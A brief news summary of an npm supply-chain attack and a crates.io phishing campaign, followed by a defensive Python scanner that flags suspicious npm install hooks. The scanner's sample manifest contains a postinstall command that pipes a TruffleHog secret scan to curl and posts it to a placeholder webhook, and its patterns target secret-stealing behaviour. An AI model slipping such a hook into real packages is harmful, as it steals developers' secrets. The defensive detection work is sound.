Cybersecurity experts have uncovered a new attack on the npm registry involving trojanized packages that exfiltrate sensitive developer secrets. The attack also includes a phishing scam targeting crates.io users to steal GitHub credentials. #npmSupplyChain #RustFoundationPhishing
Key points
- A supply chain attack compromised over 40 npm packages by injecting malicious code.
- The injected script uses TruffleHog to scan for secrets and exfiltrate them via webhooks.
- The malicious packages include tools from popular communities such as angular, react, and nativeScript.
- A separate phishing campaign targets crates.io users with fake email alerts posing as the Rust Foundation.
- The phishing links mimic GitHub login pages to steal credentials from unsuspecting developers.
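An added defensive check, not code from the article or from either campaign: it audits every package.json under a project for install-time lifecycle hooks that reference TruffleHog or a webhook-style endpoint, the two indicators the summary above gives. The hook names, the regexes and the sample manifests are assumptions constructed for illustration.

```python
import json
import re
from pathlib import Path

# Install-time hooks npm runs automatically; assumption: a trojanized package is
# likely to place its payload here (the article does not name the hook used).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators taken from the article's description: a TruffleHog scan and a
# webhook exfiltration endpoint. Extend the table for your own environment.
SUSPICIOUS_PATTERNS = {
    "trufflehog": re.compile(r"trufflehog", re.IGNORECASE),
    "webhook-url": re.compile(r"https?://[^\s\"']*webhook[^\s\"']*", re.IGNORECASE),
    "pipe-to-curl": re.compile(r"\|\s*curl\b", re.IGNORECASE),
}

def find_suspicious_hooks(pkg: dict) -> list[dict]:
    """Return one finding per (hook, indicator) pair matched in a parsed package.json."""
    findings = []
    scripts = pkg.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings  # malformed manifest: nothing to inspect
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(cmd):
                findings.append({"package": pkg.get("name", "?"), "hook": hook,
                                 "indicator": label, "script": cmd})
    return findings

def audit_tree(root: Path) -> list[dict]:
    """Walk a project tree (including node_modules) and audit every package.json."""
    findings = []
    for manifest in root.rglob("package.json"):
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or invalid JSON: skip rather than abort the audit
        findings.extend(find_suspicious_hooks(pkg))
    return findings

# Constructed sample manifests (not from the real campaign) to exercise the check.
SAMPLE_MALICIOUS = {"name": "example-trojanized-pkg", "version": "1.0.1", "scripts": {
    "postinstall": "trufflehog filesystem . --json | curl -s -d @- https://webhook.example.invalid/collect",
    "test": "echo ok"}}
SAMPLE_CLEAN = {"name": "example-clean-pkg", "scripts": {"postinstall": "node-gyp rebuild"}}

if __name__ == "__main__":
    for f in find_suspicious_hooks(SAMPLE_MALICIOUS):
        print(f"{f['package']}: {f['hook']} matched {f['indicator']}: {f['script']}")
```

Run `audit_tree(Path("."))` from a project root to scan the real dependency tree; a hit is a reason to inspect the package, not proof of compromise.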
Read More: https://thehackernews.com/2025/09/40-npm-packages-compromised-in-supply.html